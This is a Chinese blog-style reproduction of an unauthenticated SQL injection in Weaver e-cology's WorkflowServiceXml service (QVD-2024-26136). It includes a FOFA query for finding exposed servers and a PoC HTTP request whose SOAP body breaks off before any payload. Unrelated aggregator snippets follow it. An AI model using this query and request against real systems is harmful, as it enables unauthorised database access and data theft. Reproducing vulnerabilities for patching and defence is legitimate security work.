泛微E-Cology WorkflowServiceXml SQL注入漏洞复现(QVD-2024-26136)

0x01 产品简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。

0x02 漏洞概述

2024年7月,泛微官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞。

漏洞成因

该漏洞是由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现 SQL 注入漏洞。

漏洞影响

攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。

0x03 影响范围

泛微e-cology9 < 10.64.1

0x04 复现环境

FOFA:app="泛微-OA(e-cology)"

0fe8212bf2d14bff9267b2f02108c32d.png

0x05 漏洞复现

PoC

POST /services/WorkflowServiceXml HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: text/xml
Connection: close<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/46641.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

掌握Gradle配置艺术:使用Gradle Properties的精粹指南

掌握Gradle配置艺术&#xff1a;使用Gradle Properties的精粹指南 在构建自动化的世界中&#xff0c;Gradle以其灵活性和强大的依赖管理能力&#xff0c;成为了Java项目构建的首选工具之一。然而&#xff0c;随着项目规模的扩大和配置需求的增加&#xff0c;如何高效地管理和应…

springboot 适配ARM 架构

下载对应的maven https://hub.docker.com/_/maven/tags?page&page_size&ordering&name3.5.3-alpinedocker pull maven:3.5.3-alpinesha256:4c4e266aacf8ea6976b52df8467134b9f628cfed347c2f6aaf9e6aff832f7c45 2、下载对应的jdk https://hub.docker.com/_/o…

《后端程序员 · Nacos 常见配置 · 第一弹》

&#x1f4e2; 大家好&#xff0c;我是 【战神刘玉栋】&#xff0c;有10多年的研发经验&#xff0c;致力于前后端技术栈的知识沉淀和传播。 &#x1f497; &#x1f33b; CSDN入驻不久&#xff0c;希望大家多多支持&#xff0c;后续会继续提升文章质量&#xff0c;绝不滥竽充数…

C++ 类和对象(A)

一、类与对象的初步认识 1.类是对象的抽象&#xff0c;而对象是类的具体实例。 类是抽象的&#xff0c;不占用内存&#xff1b;而对象是具体的&#xff0c;占用存储空间。 2.面向过程与面向对象 C语言是面向过程的&#xff0c;关注的是过程中的数据与方法。 C是面向对象的&…

3D打印技巧

blender建模设置 避免破面 插件&#xff1a;3D打印 其中 错误连续边bad contig. edges指的是同一条线两侧法向不同&#xff0c;解决方案&#xff1a;shiftn 零面zero face指有两个面重叠&#xff0c;解决方案&#xff1a;按距离合并 非平面non flat face指四边形面的四个顶…

Django select_related()方法

select_related()的作用 select_related()是Django ORM&#xff08;对象关系映射&#xff09;中的一种查询优化方法&#xff0c;主要用于减少数据库查询次数&#xff0c;提高查询效率。当你在查询一个模型实例时&#xff0c;如果这个实例有ForeignKey关联到其他模型&#xff0…

vue3相比于vue2有哪些新特性?

Composition API&#xff1a; 组合式 API 提供了更灵活和可组合的方式来组织代码。它允许将逻辑功能集中在一起&#xff0c;而不是分散在生命周期钩子中。 import { ref, reactive, computed, watch } from vue;export default {setup() {const count ref(0);const state r…

【.NET全栈】ASP.NET开发web应用——ASP.NET中的样式、主题和母版页

文章目录 前言一、在ASP.NET中应用CSS样式1、创建CSS样式&#xff08;1&#xff09;内联样式&#xff08;2&#xff09;内部样式表&#xff08;3&#xff09;外部样式表 2、应用CSS样式&#xff08;1&#xff09;菜鸟教程-简单例子&#xff08;2&#xff09;菜鸟教程-用户界面&…

2024-07-12 Unity AI状态机1 —— 框架介绍

文章目录 1 有限状态机2 状态机实现框架2.1 StateMachine2.2 BaseState2.3 ...State2.4 IAIObject 3 框架类图 本文章参考 B 站唐老狮 2023 年直播内容。点击前往唐老狮 B 站主页。 1 有限状态机 ​ 有限状态机&#xff08;Finite - State Machine&#xff0c;FSM&#xff09…

以下不属于清廉金融文化建设推进工作思路的是() A.监管引领B.协会推进C.机构推进D.社会共建

以下不属于清廉金融文化建设推进工作思路的是() 查看完整试题答案 A.监管引领B.协会推进 C.机构推进D.社会共建 以下不属于拒腐防变的五道关口的是&#xff1a;() A.政治关B.权力关 C.交往关D.价值观 对2023年度《上海银行业保险业营业网点“清廉角“建设规范》要求在…

【Diffusion学习】【生成式AI】Diffusion Model 原理剖析 (2/4) (optional)【公式推导】

文章目录 影像生成模型本质上的共同目标【拟合分布】Maximum Likelihood Estimation VAE 影像生成模型本质上的共同目标【拟合分布】 Maximum Likelihood Estimation VAE

Python使用蓝牙抓包

在此之前需要安装pyshark库 import pyshark def capture_bluetooth_packets(): # 捕获蓝牙接口的数据包 capture pyshark.LiveCapture(interfaceyour_bluetooth_interface) for packet in capture.sniff_continuously(): print(packet) if __name__ &quo…

网络安全-网络安全及其防护措施3

11.虚拟专用网络&#xff08;VPN&#xff09; VPN的定义和作用 虚拟专用网络&#xff08;VPN&#xff09;是一种通过公用网络&#xff08;如互联网&#xff09;建立安全、加密连接的方法&#xff0c;使用户能够安全地访问内部网络资源。VPN的主要作用包括&#xff1a; 数据保…

# Redis 入门到精通(四)-- linux 环境安装 redis

Redis 入门到精通&#xff08;四&#xff09;-- linux 环境安装 redis 一、linux 环境安装 redis – 基于 Linux 安装 redis 1、基于 Center 0S7 或者 unbunt-18.04 安装 Redis 1&#xff09;下载安装包wget http://download.redis.io/releases/redis-?.?.?.tar.gz 如&…

夏令营入门组day4

一. 题目 二. 思路 &#xff08;1&#xff09;B要先去和A回合&#xff0c;因为B只能将红染成蓝&#xff0c;不能直接将白染成蓝&#xff0c;所以B必须走A走过的路才有效。 &#xff08;2&#xff09;答案分为两部分&#xff0c;去和A回合的最短距离 以回合点为根节点&#xf…

FPGA上板项目(二)——PLL测试

目录 实验内容实验原理实验步骤实验结果 实验内容 将差分时钟信号转化为 192MHz 时钟信号作为输出。 实验原理 PLL&#xff0c;即锁相环&#xff0c;一种反馈控制电路&#xff0c;具有时钟倍频、分频、相位偏移和可编程占空比的功能。 实验步骤 添加 clocking wizard IP核&…

Gitlab CI/CD --- use a sample CI/CD template

0 Preface/Foreword Pipeline, job, stage的关系如下描述&#xff1a; A pipeline is composed of independent jobs that run scripts, grouped into stages. Stages run in sequential order, but jobs within stages run in parallel. 关键信息&#xff1a; pipeline由独…

Ubuntu 磁盘扩容

1.下载工具 sudo apt-get install gparted 2.调整大小

各种常用格式校验方法(身份证号格式校验、手机号格式校验、车牌号格式校验...)正则表达式

1、手机号格式校验&#xff08;1&#xff09; /*** 手机号码-合法性-正则校验* param phoneNumber* return*/public static boolean isValidatePhoneNumber(String phoneNumber) {Pattern pattern Pattern.compile("^[1][3-9]\\d{9}$");Matcher matcher pattern.ma…

IP风险画像 金融行业的安全盾牌

在当今数字化时代&#xff0c;金融行业面临着前所未有的安全挑战。随着在线交易和数字银行业务的迅猛发展&#xff0c;欺诈和网络攻击的威胁也在不断增加。金融机构需要高效、可靠的安全解决方案来保护客户的资产和个人信息&#xff0c;防止各种形式的欺诈行为。 IP风险画像是…